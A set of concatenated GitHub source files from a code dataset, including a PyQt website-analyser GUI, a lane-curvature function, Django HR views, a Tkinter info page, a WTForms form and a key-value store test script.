\"btn_internet_speed\",\n            \"btn_text\": \"Analyse Internet Speed\",\n            \"btn_tooltip\": \"Analyse your Network Performance\",\n            \"show_top\": True,\n            \"is_active\": False,\n        },\n        {\n            \"btn_icon\": \"icon_signal.svg\",\n            \"btn_id\": \"btn_dns\",\n            \"btn_text\": \"Analyse DNS\",\n            \"btn_tooltip\": \"Analyse any Site's DNS\",\n            \"show_top\": True,\n            \"is_active\": False,\n        },\n        {\n            \"btn_icon\": \"icon_idle.svg\",\n            \"btn_id\": \"btn_ping\",\n            \"btn_text\": \"Analyse Response Time\",\n            \"btn_tooltip\": \"Analyse Response Time\",\n            \"show_top\": True,\n            \"is_active\": False,\n        },\n        {\n            \"btn_icon\": \"icon_folder.svg\",\n            \"btn_id\": \"btn_loading_speed\",\n            \"btn_text\": \"Analyse Loading Speed\",\n            \"btn_tooltip\": \"Analyse Site Loading Speed\",\n            \"show_top\": True,\n            \"is_active\": False,\n        },\n        {\n            \"btn_icon\": \"icon_settings.svg\",\n            \"btn_id\": \"btn_settings\",\n            \"btn_text\": \"Settings\",\n            \"btn_tooltip\": \"Settings\",\n            \"show_top\": False,\n            \"is_active\": False,\n        }\n    ]\n\n    # ADD TITLE BAR MENUS\n    # ///////////////////////////////////////////////////////////////\n    add_title_bar_menus = [\n        {\n            \"btn_icon\": \"icon_search.svg\",\n            \"btn_id\": \"btn_search\",\n            \"btn_tooltip\": \"Search\",\n            \"is_active\": False\n        },\n        {\n            \"btn_icon\": \"icon_settings.svg\",\n            \"btn_id\": \"btn_top_settings\",\n            \"btn_tooltip\": \"Top settings\",\n            \"is_active\": False\n        }\n    ]\n\n    # SETUP CUSTOM BTNs OF CUSTOM WIDGETS\n    # Get sender() function when btn is clicked\n    # ///////////////////////////////////////////////////////////////\n    def setup_btns(self):\n        if self.ui.title_bar.sender() != None:\n            return self.ui.title_bar.sender()\n        elif self.ui.left_menu.sender() != None:\n            return self.ui.left_menu.sender()\n        elif self.ui.left_column.sender() != None:\n            return self.ui.left_column.sender()\n\n    # SETUP MAIN WINDOW WITH CUSTOM PARAMETERS\n    # ///////////////////////////////////////////////////////////////\n    def setup_gui(self):\n        # APP TITLE\n        # ///////////////////////////////////////////////////////////////\n        
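# NOTE (assumption): self.settings is expected to be populated by the main window before setup_gui() runs; the Settings() load further below simply refreshes it.\n        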
self.setWindowTitle(self.settings[\"app_name\"])\n\n # REMOVE TITLE BAR\n # ///////////////////////////////////////////////////////////////\n if self.settings[\"custom_title_bar\"]:\n self.setWindowFlag(Qt.FramelessWindowHint)\n self.setAttribute(Qt.WA_TranslucentBackground)\n\n # ADD GRIPS\n # ///////////////////////////////////////////////////////////////\n if self.settings[\"custom_title_bar\"]:\n self.left_grip = PyGrips(self, \"left\", self.hide_grips)\n self.right_grip = PyGrips(self, \"right\", self.hide_grips)\n self.top_grip = PyGrips(self, \"top\", self.hide_grips)\n self.bottom_grip = PyGrips(self, \"bottom\", self.hide_grips)\n self.top_left_grip = PyGrips(self, \"top_left\", self.hide_grips)\n self.top_right_grip = PyGrips(self, \"top_right\", self.hide_grips)\n self.bottom_left_grip = PyGrips(self, \"bottom_left\", self.hide_grips)\n self.bottom_right_grip = PyGrips(self, \"bottom_right\", self.hide_grips)\n\n # LEFT MENUS / GET SIGNALS WHEN LEFT MENU BTN IS CLICKED / RELEASED\n # ///////////////////////////////////////////////////////////////\n # ADD MENUS\n self.ui.left_menu.add_menus(SetupMainWindow.add_left_menus)\n\n # SET SIGNALS\n self.ui.left_menu.clicked.connect(self.btn_clicked)\n self.ui.left_menu.released.connect(self.btn_released)\n\n # TITLE BAR / ADD EXTRA BUTTONS\n # ///////////////////////////////////////////////////////////////\n\n # ADD MENUS\n self.ui.title_bar.add_menus(SetupMainWindow.add_title_bar_menus)\n\n # SET SIGNALS\n self.ui.title_bar.clicked.connect(self.btn_clicked)\n self.ui.title_bar.released.connect(self.btn_released)\n\n # ADD Title\n if self.settings[\"custom_title_bar\"]:\n self.ui.title_bar.set_title(self.settings[\"app_name\"])\n else:\n self.ui.title_bar.set_title(\"Welcome to Web Analyser\")\n\n # LEFT COLUMN SET SIGNALS\n # ///////////////////////////////////////////////////////////////\n self.ui.left_column.clicked.connect(self.btn_clicked)\n self.ui.left_column.released.connect(self.btn_released)\n\n # SET INITIAL PAGE / SET LEFT AND RIGHT COLUMN MENUS\n # ///////////////////////////////////////////////////////////////\n MainFunctions.set_page(self, self.ui.load_pages.home)\n MainFunctions.set_left_column_menu(\n self,\n menu=self.ui.left_column.menus.menu_1,\n title=\"Settings Left Column\",\n icon_path=Functions.set_svg_icon(\"icon_settings.svg\")\n )\n MainFunctions.set_right_column_menu(self, self.ui.right_column.menu_1)\n\n # ///////////////////////////////////////////////////////////////\n # EXAMPLE CUSTOM WIDGETS\n # Here are added the custom widgets to pages and columns that\n # were created using Qt Designer.\n # This is just an example and should be deleted when creating\n # your application.\n #\n # OBJECTS FOR LOAD PAGES, LEFT AND RIGHT COLUMNS\n # You can access objects inside Qt Designer projects using\n # the objects below:\n #\n # \n # LEFT COLUMN: self.ui.left_column.menus\n # RIGHT COLUMN: self.ui.right_column\n # LOAD PAGES: self.ui.load_pages\n # \n # ///////////////////////////////////////////////////////////////\n\n # LOAD SETTINGS\n # ///////////////////////////////////////////////////////////////\n settings = Settings()\n self.settings = settings.items\n\n # LOAD THEME COLOR\n # ///////////////////////////////////////////////////////////////\n themes = Themes()\n self.themes = themes.items\n self.ls_input = PyLineEdit(\n place_holder_text=\"Enter site name\",\n radius=8,\n color=self.themes[\"app_color\"][\"text_foreground\"],\n bg_color=self.themes[\"app_color\"][\"dark_one\"],\n )\n 
self.ls_input.setMinimumHeight(40)\n self.ls_btn_submit = PyPushButton(\n text=\"Submit\",\n radius=8,\n color=self.themes[\"app_color\"][\"text_foreground\"],\n bg_color=self.themes[\"app_color\"][\"dark_one\"],\n bg_color_hover=self.themes[\"app_color\"][\"dark_three\"],\n bg_color_pressed=self.themes[\"app_color\"][\"dark_four\"]\n )\n self.ls_btn_submit.setMinimumHeight(40)\n self.ls_btn_submit.setMaximumWidth(300)\n\n self.ls_table = PyTableWidget(\n radius=8,\n color=self.themes[\"app_color\"][\"text_foreground\"],\n selection_color=self.themes[\"app_color\"][\"context_color\"],\n bg_color=self.themes[\"app_color\"][\"bg_two\"],\n header_horizontal_color=self.themes[\"app_color\"][\"dark_two\"],\n header_vertical_color=self.themes[\"app_color\"][\"bg_three\"],\n bottom_line_color=self.themes[\"app_color\"][\"bg_three\"],\n grid_line_color=self.themes[\"app_color\"][\"bg_one\"],\n scroll_bar_bg_color=self.themes[\"app_color\"][\"bg_one\"],\n scroll_bar_btn_color=self.themes[\"app_color\"][\"dark_four\"],\n context_color=self.themes[\"app_color\"][\"context_color\"]\n )\n self.ls_table.setColumnCount(2)\n self.ls_table.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)\n self.ls_table.setSelectionMode(QAbstractItemView.ExtendedSelection)\n self.ls_table.setSelectionBehavior(QAbstractItemView.SelectRows)\n\n self.column_1 = QTableWidgetItem()\n self.column_1.setText(\"Site Name\")\n\n self.column_2 = QTableWidgetItem()\n self.column_2.setText(\"Loading Speed (sec)\")\n\n # Set column\n self.ls_table.setHorizontalHeaderItem(0, self.column_1)\n self.ls_table.setHorizontalHeaderItem(1, self.column_2)\n\n def ls_on_submit():\n sitename = self.ls_input.text()\n score, data = analyser.compare_load_times(sitename)\n for row in data:\n row_number = self.ls_table.rowCount()\n self.ls_table.insertRow(row_number)\n self.ls_table.setItem(\n row_number, 0, QTableWidgetItem(row[0]))\n self.ls_table.setItem(\n row_number, 1, QTableWidgetItem(str(row[1])))\n\n row_number = self.ls_table.rowCount()\n self.ls_table.insertRow(row_number)\n self.ls_table.setItem(\n row_number, 0, QTableWidgetItem('Score: '))\n self.ls_table.setItem(\n row_number, 1, QTableWidgetItem(str(score)))\n\n self.ls_input.setText(\"\")\n self.ls_btn_submit.clicked.connect(ls_on_submit)\n\n self.ui.load_pages.ls_top_layout.addWidget(self.ls_input)\n self.ui.load_pages.ls_btn_layout.addWidget(self.ls_btn_submit)\n self.ui.load_pages.ls_main_layout.addWidget(self.ls_table)\n\n # RS Starts here\n # /////////////////////////////////////////////////////////////\n self.rs_input = PyLineEdit(\n place_holder_text=\"Enter site name\",\n radius=8,\n color=self.themes[\"app_color\"][\"text_foreground\"],\n bg_color=self.themes[\"app_color\"][\"dark_one\"],\n )\n self.rs_input.setMinimumHeight(40)\n self.rs_btn_submit = PyPushButton(\n text=\"Submit\",\n radius=8,\n color=self.themes[\"app_color\"][\"text_foreground\"],\n bg_color=self.themes[\"app_color\"][\"dark_one\"],\n bg_color_hover=self.themes[\"app_color\"][\"dark_three\"],\n bg_color_pressed=self.themes[\"app_color\"][\"dark_four\"]\n )\n self.rs_btn_submit.setMinimumHeight(40)\n self.rs_btn_submit.setMaximumWidth(300)\n\n self.rs_table = PyTableWidget(\n radius=8,\n color=self.themes[\"app_color\"][\"text_foreground\"],\n selection_color=self.themes[\"app_color\"][\"context_color\"],\n bg_color=self.themes[\"app_color\"][\"bg_two\"],\n header_horizontal_color=self.themes[\"app_color\"][\"dark_two\"],\n header_vertical_color=self.themes[\"app_color\"][\"bg_three\"],\n 
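# rs_table mirrors the ls_table styling above, reusing the same theme color keys\n            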
bottom_line_color=self.themes[\"app_color\"][\"bg_three\"],\n            grid_line_color=self.themes[\"app_color\"][\"bg_one\"],\n            scroll_bar_bg_color=self.themes[\"app_color\"][\"bg_one\"],\n            scroll_bar_btn_color=self.themes[\"app_color\"][\"dark_four\"],\n            context_color=self.themes[\"app_color\"][\"context_color\"]\n        )\n        self.rs_table.setColumnCount(2)\n        self.rs_table.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)\n        self.rs_table.setSelectionMode(QAbstractItemView.ExtendedSelection)\n        self.rs_table.setSelectionBehavior(QAbstractItemView.SelectRows)\n\n        self.column_1 = QTableWidgetItem()\n        self.column_1.setText(\"Site Name\")\n\n        self.column_2 = QTableWidgetItem()\n        self.column_2.setText(\"Response Time (sec)\")\n\n        # Set column\n        self.rs_table.setHorizontalHeaderItem(0, self.column_1)\n        self.rs_table.setHorizontalHeaderItem(1, self.column_2)\n\n        def rs_on_submit():\n            sitename = self.rs_input.text()\n            score, data = analyser.compare_ping(sitename)\n            for row in data:\n                row_number = self.rs_table.rowCount()\n                self.rs_table.insertRow(row_number)\n                self.rs_table.setItem(\n                    row_number, 0, QTableWidgetItem(row[0]))\n                self.rs_table.setItem(\n                    row_number, 1, QTableWidgetItem(str(row[1])))\n\n            row_number = self.rs_table.rowCount()\n            self.rs_table.insertRow(row_number)\n            self.rs_table.setItem(\n                row_number, 0, QTableWidgetItem('Score: '))\n            self.rs_table.setItem(\n                row_number, 1, QTableWidgetItem(str(score)))\n\n            self.rs_input.setText(\"\")\n        self.rs_btn_submit.clicked.connect(rs_on_submit)\n\n        self.ui.load_pages.rs_top_layout.addWidget(self.rs_input)\n        self.ui.load_pages.rs_btn_layout.addWidget(self.rs_btn_submit)\n        self.ui.load_pages.rs_main_layout.addWidget(self.rs_table)\n\n        self.st_btn_submit = PyPushButton(\n            text=\"SpeedTest\",\n            radius=8,\n            color=self.themes[\"app_color\"][\"text_foreground\"],\n            bg_color=self.themes[\"app_color\"][\"dark_one\"],\n            bg_color_hover=self.themes[\"app_color\"][\"dark_three\"],\n            bg_color_pressed=self.themes[\"app_color\"][\"dark_four\"]\n        )\n        self.st_btn_submit.setMinimumHeight(40)\n        self.st_btn_submit.setMaximumWidth(300)\n\n        self.st_label_download_speed = QLabel('Download Speed: _ Mbps')\n        self.st_label_upload_speed = QLabel('Upload Speed: _ Mbps')\n        self.st_label_ping = QLabel('Ping: _ ms')\n\n        def on_st_btn_submit():\n            download_speed, upload_speed, ping = analyser.get_internet_speed()\n            self.st_label_download_speed.setText(\n                f'Download Speed: {download_speed} Mbps')\n            self.st_label_upload_speed.setText(f'Upload Speed: {upload_speed} Mbps')\n            self.st_label_ping.setText(f'Ping: {ping} ms')\n\n        self.st_btn_submit.clicked.connect(on_st_btn_submit)\n        self.ui.load_pages.st_top_layout.addWidget(self.st_btn_submit)\n        self.ui.load_pages.st_top_layout.addWidget(self.st_label_download_speed)\n        self.ui.load_pages.st_top_layout.addWidget(self.st_label_upload_speed)\n        self.ui.load_pages.st_top_layout.addWidget(self.st_label_ping)\n\n        # DNS\n        # ////////////////////////////////////////////////\n        self.dns_btn_submit = PyPushButton(\n            text=\"Get Info\",\n            radius=8,\n            color=self.themes[\"app_color\"][\"text_foreground\"],\n            bg_color=self.themes[\"app_color\"][\"dark_one\"],\n            bg_color_hover=self.themes[\"app_color\"][\"dark_three\"],\n            bg_color_pressed=self.themes[\"app_color\"][\"dark_four\"]\n        )\n        self.dns_btn_submit.setMinimumHeight(40)\n        self.dns_btn_submit.setMaximumWidth(300)\n\n        self.dns_sitename = PyLineEdit(place_holder_text=\"Enter domain name\")\n        self.dns_label = QTextEdit()\n\n        def on_dns_btn_submit():\n            domain_name = self.dns_sitename.text()\n            domain_info 
= analyser.get_domain_info(domain_name)\n            print(domain_info)\n            self.dns_label.setText(str(domain_info))\n            self.dns_sitename.setText(\"\")\n\n        self.dns_btn_submit.clicked.connect(on_dns_btn_submit)\n        self.ui.load_pages.dns_top_layout.addWidget(self.dns_sitename)\n        self.ui.load_pages.dns_top_layout.addWidget(self.dns_btn_submit)\n        self.ui.load_pages.dns_main_layout.addWidget(self.dns_label)\n\n        # BTN 2\n        # self.left_btn_2 = PyPushButton(\n        #     text=\"Btn With Icon\",\n        #     radius=8,\n        #     color=self.themes[\"app_color\"][\"text_foreground\"],\n        #     bg_color=self.themes[\"app_color\"][\"dark_one\"],\n        #     bg_color_hover=self.themes[\"app_color\"][\"dark_three\"],\n        #     bg_color_pressed=self.themes[\"app_color\"][\"dark_four\"]\n        # )\n        # self.icon = QIcon(Functions.set_svg_icon(\"icon_settings.svg\"))\n        # self.left_btn_2.setIcon(self.icon)\n        # self.left_btn_2.setMaximumHeight(40)\n        # self.ui.left_column.menus.btn_2_layout.addWidget(self.left_btn_2)\n\n    # RESIZE GRIPS AND CHANGE POSITION\n    # Resize or change position when window is resized\n    # ///////////////////////////////////////////////////////////////\n\n    def resize_grips(self):\n        if self.settings[\"custom_title_bar\"]:\n            self.left_grip.setGeometry(5, 10, 10, self.height())\n            self.right_grip.setGeometry(self.width() - 15, 10, 10, self.height())\n            self.top_grip.setGeometry(5, 5, self.width() - 10, 10)\n            self.bottom_grip.setGeometry(\n                5, self.height() - 15, self.width() - 10, 10)\n            self.top_right_grip.setGeometry(self.width() - 20, 5, 15, 15)\n            self.bottom_left_grip.setGeometry(5, self.height() - 20, 15, 15)\n            self.bottom_right_grip.setGeometry(\n                self.width() - 20, self.height() - 20, 15, 15)\n","repo_name":"Adnan-S-Husain/site-analyser","sub_path":"gui/uis/windows/main_window/setup_main_window.py","file_name":"setup_main_window.py","file_ext":"py","file_size_in_byte":17616,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"29968377084","text":"import numpy as np\n\ndef measure_center_curvature(left_fit_coef, right_fit_coef, image_shape):\n    \"\"\"\n    It takes the polynomial functions and original image dimensions.\n    It calculates the offset of the car from the center of the lanes and the curvature in meters.\n    It returns the offset, the direction the car should go, and the average curvature of the road.\n    \"\"\"\n\n    # Conversions from pixels to meters\n    ym_per_pix = 30/720 # meters per pixel in y dimension\n    xm_per_pix = 3.7/700 # meters per pixel in x dimension\n\n    ############ Calculating the car offset\n    # Get the position of the car (in the middle of the image)\n    car_center_x = image_shape[1] / 2 # the middle of the x_axis range\n\n    # Get the x dimension of the center between the two lanes at the bottom of the image\n    # by substituting in the 2nd order polynomial curve x = Ay^2 + By + C\n    # where y is the maximum value at the bottom of the page, i.e. the image height image_shape[0]\n    left_lane_bottom_x = left_fit_coef[0] * (image_shape[0] ** 2) + left_fit_coef[1] * image_shape[0] + left_fit_coef[2]\n    right_lane_bottom_x = right_fit_coef[0] * (image_shape[0] ** 2) + right_fit_coef[1] * image_shape[0] + \\\n                          right_fit_coef[2]\n    lane_center_x = (left_lane_bottom_x + right_lane_bottom_x) / 2\n\n    # Get the car_offset i.e the difference between the lane_center and car_center\n    car_offset = (lane_center_x - car_center_x) * xm_per_pix # in meters\n    car_offset = round(car_offset, 3)\n\n    # Get the direction of the car offset\n    direction = \"\"\n    if car_offset > 0:\n        direction = \"Go right\"\n    elif car_offset < 0:\n        direction = 
\"Go left\"\n else:\n direction = \"Stay put\"\n\n car_offset = np.absolute(car_offset)\n\n\n ############ Calculating the radius of curvature\n # Get the y (vertical, first dimension in image_shape) value where the curvature should calculated\n y_eval = image_shape[0] # the maximum value i.e the bottom of the image\n\n # Calculation of radius of curvature of 2nd order polynomial using the formula R = (1 + (2Ay + B)^2)^(3/2) / (|2A|)\n # where A and B are the polynomial coefficients 0 and 1 respectively\n # y is y_eval (where the radius should be calculated) * ym_per_pix to be in meters\n left_curve_rad = ((1 + (2*left_fit_coef[0]*y_eval*ym_per_pix + left_fit_coef[1])**2)**(3.0/2)) / np.absolute(2*left_fit_coef[0])\n right_curve_rad = ((1 + (2*right_fit_coef[0]*y_eval*ym_per_pix + right_fit_coef[1])**2)**(3.0/2)) / np.absolute(2*right_fit_coef[0])\n curvature = (left_curve_rad + right_curve_rad) / 2.0\n curvature = round(curvature, 3)\n\n return str(car_offset), direction, str(curvature)\n","repo_name":"Joy-Amir/Simple-Perception-Stack-for-SDCs","sub_path":"measure_center_curvature.py","file_name":"measure_center_curvature.py","file_ext":"py","file_size_in_byte":2672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"341588714","text":"from django.shortcuts import render, HttpResponse\nfrom company.forms import JobForm\nfrom company.models import HR_bio, Application,Job\nfrom django.contrib.auth.decorators import login_required\nfrom user.models import Dev, Skill\n\n@login_required\ndef dashboard(request,username):\n if(request.user.type=='HR'):\n if(request.method==\"POST\"):\n query = request.POST['search']\n dev = Dev.objects.all().filter(username=query)\n res = Skill.objects.all()\n usernames = []\n for i in res:\n if(query in i.skill_string.split(',')):\n usernames.append(i.user.username)\n print(usernames)\n return render(request,'hrdash.html',{'dev':dev,'usernames':usernames})\n return render(request, 'hrdash.html')\n else:\n return render(request,'404.html')\n\n@login_required\ndef post_jobs(request):\n if(request.user.type=='HR'):\n if(request.method=='POST'):\n form = JobForm(request.POST)\n if(form.is_valid):\n form.save()\n return render(request,'application.html',{'message':'Job posting has been created!'})\n company = HR_bio.objects.all().filter(user=request.user)[0].works_for\n form = JobForm(initial={'company':company,'posted_by':request.user})\n return render(request,'create_job.html',{'form':form})\n else:\n return render(request,'404.html')\n\n\n@login_required\ndef posted_jobs(request):\n if(request.user.type=='HR'):\n jobs = Job.objects.all().filter(posted_by=request.user)\n return render(request,'posted_jobs.html',{'jobs':jobs})\n else:\n return render(request,'404.html')\n\n@login_required\ndef view_applications(request,id):\n if(request.user.type=='HR'):\n job = Job.objects.all().filter(id=id)\n applications = Application.objects.all().filter(job_name=job[0])\n return render(request,'applied_devs.html',{'applications':applications,'job':job[0]})\n else:\n render(request,'404.html')\n\n","repo_name":"hyre/server","sub_path":"company/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"74041892369","text":"from tkinter import*\nfrom tkinter import ttk\nfrom PIL import Image,ImageTk\nfrom tkinter import messagebox\nimport mysql.connector\nfrom mysql.connector import cursor\nimport 
cv2\nimport os\nimport tkinter\n\n\nclass Developer:\n    def __init__(self,root):\n        self.root=root\n        self.root.geometry(\"1368x768+0+0\")\n        self.root.title(\"Developer Information\")\n\n        title_lbl=Label(self.root,text=\"Developer\",font=(\"times new roman\",20,\"bold\"),bg=\"white\",fg=\"blue\")\n        title_lbl.place(x=0,y=0,width=1368,height=35)\n        \n        # Back button\n        \n        b1_1=Button(self.root,text=\"Back\",cursor=\"hand2\",command=self.Back,font=(\"times new roman\",15,\"bold\"),bg=\"white\",fg=\"black\")\n        b1_1.place(x=1310,y=0,width=50,height=30)\n        title_lbl_1=Label(self.root,text=\"DEVELOPED BY APURV A. RATHOD (ENROLLMENT NO:-180470107049)\",font=(\"times new roman\",12,\"bold\"),bg=\"white\",fg=\"green\")\n        title_lbl_1.place(x=0,y=535,width=1368,height=35)\n\n        img_top=Image.open(r'img\\dev.jpg')\n        img_top=img_top.resize((1368,700),Image.ANTIALIAS)  # high resolution to low\n        self.photoimg_top=ImageTk.PhotoImage(img_top)\n\n        f_lbl=Label(self.root,image=self.photoimg_top)\n        f_lbl.place(x=0,y=35,width=1368,height=700)\n\n        # Frame\n        \n        main_frame=Frame(f_lbl,bd=2,bg=\"white\")\n        main_frame.place(x=800,y=0,width=600,height=600)\n\n        img_top1=Image.open(r\"img\\APURV RATHOD.jpg\")\n        img_top1=img_top1.resize((200,200),Image.ANTIALIAS)\n        self.photoimg_top_tool=ImageTk.PhotoImage(img_top1)\n\n        f_lbl=Label(main_frame,image=self.photoimg_top_tool)\n        f_lbl.place(x=350,y=0,width=200,height=200)\n\n        \n        # Developer info\n\n        dev_label=Label(main_frame,text='Hello, my name is Apurv.',font=(\"times new roman\",13,\"bold\"),bg=\"white\")\n        dev_label.place(x=0,y=5)\n\n        dev_label=Label(main_frame,text='I am a student of V.V.P Engineering College.',font=(\"times new roman\",13,\"bold\"),bg=\"white\")\n        dev_label.place(x=0,y=40)\n\n        dev_label=Label(main_frame,text='I am passionate about learning new things.',font=(\"times new roman\",13,\"bold\"),bg=\"white\")\n        dev_label.place(x=0,y=75)\n\n        img_top2=Image.open(r'img\\1_5TRuG7tG0KrZJXKoFtHlSg.jpeg')\n        img_top2=img_top2.resize((600,390),Image.ANTIALIAS)  # high resolution to low\n        self.photoimg_top2=ImageTk.PhotoImage(img_top2)\n\n        f_lbl=Label(self.root,image=self.photoimg_top2)\n        f_lbl.place(x=800,y=270,width=600,height=390)\n\n    def Back(self):\n        self.root.destroy()\n\n\n\nif __name__ == \"__main__\":\n    root = Tk()\n    obj=Developer(root)\n    root.mainloop()","repo_name":"APURV-23/Advanced-Attendance-System","sub_path":"Face_Recog/developer.py","file_name":"developer.py","file_ext":"py","file_size_in_byte":2615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"2241982254","text":"from flask_wtf import FlaskForm\nfrom wtforms import StringField, IntegerField, EmailField\nfrom wtforms.validators import DataRequired, Email, ValidationError\nfrom app.models import User\nfrom flask_login import current_user\n\n\ndef user_exists(form, field):\n    # Checking if email exists\n    email = field.data\n\n    all_other_users = User.query.filter(User.id != str(current_user.id)).all()\n\n    for user in all_other_users:\n        if email == user.email:\n            raise ValidationError('Email is already in use.')\n\n\ndef username_exists(form, field):\n    # Checking if username is already in use\n    username_input = field.data\n\n    all_other_users = User.query.filter(User.id != str(current_user.id)).all()\n\n    for user in all_other_users:\n        if username_input == user.username:\n            raise ValidationError('Username is already in use.')\n\ndef email_ending(form, field):\n    email = field.data\n    if not email.lower().endswith('.com'):\n        raise ValidationError('Email must end with .com')\n\ndef 
zipcode_valid(form, field):\n zipcode = str(field.data)\n if len(zipcode) != 5:\n raise ValidationError(\"Zipcode must be a length of 5\")\n for char in zipcode:\n if not char.isdigit():\n raise ValidationError(\"Zipcode must only contain digits no letters\")\n\n\nclass ManageForm(FlaskForm):\n username = StringField('username', validators=[DataRequired(), username_exists])\n email = EmailField('email', validators=[DataRequired(), user_exists, email_ending])\n first_name = StringField('first_name', validators=[DataRequired()])\n last_name = StringField('last_name', validators=[DataRequired()])\n address = StringField('address', validators=[DataRequired()])\n city = StringField('city', validators=[DataRequired()])\n state = StringField('state', validators=[DataRequired()])\n zip_code = StringField('zip_code', validators=[DataRequired(), zipcode_valid])\n password = StringField('password', validators=[DataRequired()])\n","repo_name":"nathanrobertbaldwin/rignite","sub_path":"app/forms/manage_account_form.py","file_name":"manage_account_form.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"2074282126","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 26 22:29:22 2019\n\n@author: zqwu\n\"\"\"\n\nimport os\nimport numpy as np\n\ninput_raw = './DeepSEA/infile.vcf.out.funsig'\noutput = './output.varDeepSEA'\n\nf1 = open(input_raw, 'r')\nf2 = open(output, 'w')\n\nf2.write('Name,DeepSEAScore\\n')\ndat = {}\nfor i, line in enumerate(f1):\n if i==0:\n continue\n line = line.strip().split(',')\n dat[int(line[0])] = (line[1][3:] + '_' + line[2] + '_' + line[4] + '_' + line[5] + '_b37', float(line[-1]))\n\nfor k in sorted(dat.keys()):\n f2.write(dat[k][0] + ',' + str(dat[k][1]) + '\\n')\n\nf1.close()\nf2.close()","repo_name":"miaecle/eQTL_Trees","sub_path":"scripts/support_scripts/process_DeepSEA.py","file_name":"process_DeepSEA.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"5427160145","text":"import requests\nimport time\n\nREPLICA1_PORT = '8082'\nREPLICA2_PORT = '8083'\n\nREPLICA1_URL = 'http://localhost:8082/key-value-store-view'\nREPLICA2_URL = 'http://localhost:8083/key-value-store-view'\nREPLICA3_URL = 'http://localhost:8084/key-value-store-view'\n\n## Request functions\n\ndef getviewOp(url):\n # get the view from replica1\n response = requests.get(url)\n responseInJson = response.json()\n print(responseInJson)\n print(response.status_code)\n # put to the view from replica1\n\ndef putviewOp(url):\n response = requests.put(url, json={'socket-address' :'10.10.0.5:8085'})\n responseInJson = response.json()\n print(responseInJson)\n print(response.status_code)\n\ndef deleteviewOp(url):\n response = requests.delete(url, json={'socket-address' :'10.10.0.5:8085'})\n responseInJson = response.json()\n print(responseInJson)\n print(response.status_code)\n\n## run operations\ndef putkvOp(port, key, val, cm):\n response = requests.put('http://localhost:'+ port +'/key-value-store/' + key, json={'value' : val, 'causal-metadata': cm})\n responseInJson = response.json()\n print(responseInJson)\n print(response.status_code)\n return responseInJson['causal-metadata']\n\n\ndef getkvOp(port, key, cm):\n response = requests.get( 'http://localhost:'+ port +'/key-value-store/' + key, json={'causal-metadata': cm} )\n responseInJson = response.json()\n print(responseInJson)\n 
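# NOTE: the causal-metadata returned here must be threaded into the next request so the store can enforce causal consistency across replicas.\n    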
print(response.status_code)\n    return responseInJson['causal-metadata']\n\ndef deletekvOp(port, key, cm):\n    response = requests.delete('http://localhost:'+ port +'/key-value-store/' + key, json={'causal-metadata' : cm})\n    responseInJson = response.json()\n    print(responseInJson)\n    print(response.status_code)\n    return responseInJson['causal-metadata']\n\ndef putNode(port, key, socketAdd):\n    response = requests.put('http://localhost:'+ port +'/key-value-store-shard/add-member/' + key, json={'socket-address' : socketAdd})\n    responseInJson = response.json()\n    print(responseInJson)\n    print(response.status_code)\n\n\n## Unit Tests\n\n# Assume two empty replicas are running -- REPLICA1 and REPLICA2\ndef test1():\n    lastCm = putkvOp(REPLICA1_PORT, \"alice\", \"I AM ALICE\", '')\n    lastCm = putkvOp(REPLICA1_PORT, \"bob\", \"I AM BOB\", lastCm)\n\ndef test2():\n    lastCm = putkvOp(REPLICA1_PORT, \"alice\", \"I AM ALICE\", '')\n    lastCm = putkvOp(REPLICA2_PORT,'bob', 'I AM BOB', lastCm)\n\ndef test3():\n    lastCm = putkvOp(REPLICA1_PORT, \"alice\", \"I AM ALICE\", '')\n    lastCm = putkvOp(REPLICA1_PORT, \"bob\", \"I AM BOB\", lastCm)\n    lastCm = putkvOp(REPLICA1_PORT, \"carol\", \"I AM CAROL\", lastCm)\n    lastCm = deletekvOp(REPLICA2_PORT, \"carol\", lastCm)\n\ndef test4():\n    lastCm = putkvOp(REPLICA1_PORT, \"alice\", \"I AM ALICE\", '')\n    deletekvOp(REPLICA1_PORT, \"alice\", lastCm)\n\ndef test5():\n    lastCm = putkvOp(REPLICA1_PORT, \"alice\", \"I AM ALICE\", '')\n    lastCm = putkvOp(REPLICA1_PORT, \"bob\", \"I AM BOB\", lastCm)\n    lastCm = putkvOp(REPLICA1_PORT, \"carol\", \"I AM CAROL\", lastCm)\n    lastCm = getkvOp(REPLICA2_PORT, \"alice\", '')\n    getkvOp(REPLICA1_PORT, \"alice\", '')\n\n\n\n\nif __name__ == '__main__':\n    # test5()\n    # # { '10.10.0.2': 0, '10.10.0.3': 0}\n    # vc = putkvOp('8082', 'key0', 'value0', '')\n\n    # vc = putkvOp('8083', 'key1', 'value1', vc)\n\n    # vc = putkvOp('8084', 'key2', 'value2', vc)\n\n    # vc = putkvOp('8085', 'key3', 'value3', vc)\n\n    # vc = putkvOp('8082', 'key4', 'value4', vc)\n\n    # vc = putkvOp('8083', 'key5', 'value5', vc)\n\n    # vc = putkvOp('8084', 'key6', 'value6', vc)\n\n    # vc = putkvOp('8085', 'key7', 'value7', vc)\n\n    # vc = putkvOp('8082', 'key8', 'value8', vc)\n\n    # vc = putkvOp('8083', 'key9', 'value9', vc)\n\n    # vc = putkvOp('8084', 'key10', 'value10', vc)\n    vc = ''\n    for i in range(500):\n        j = (i%6) + 2\n        vc = putkvOp('808'+str(j), 'key'+str(i), 'value'+str(i), vc)\n\n    for i in range(500):\n        j = (i%6) + 2\n        getkvOp('808'+str(j), 'key'+str(i), '')\n\n    # putNode('8082', '1', '10.10.0.5:8085')\n    # 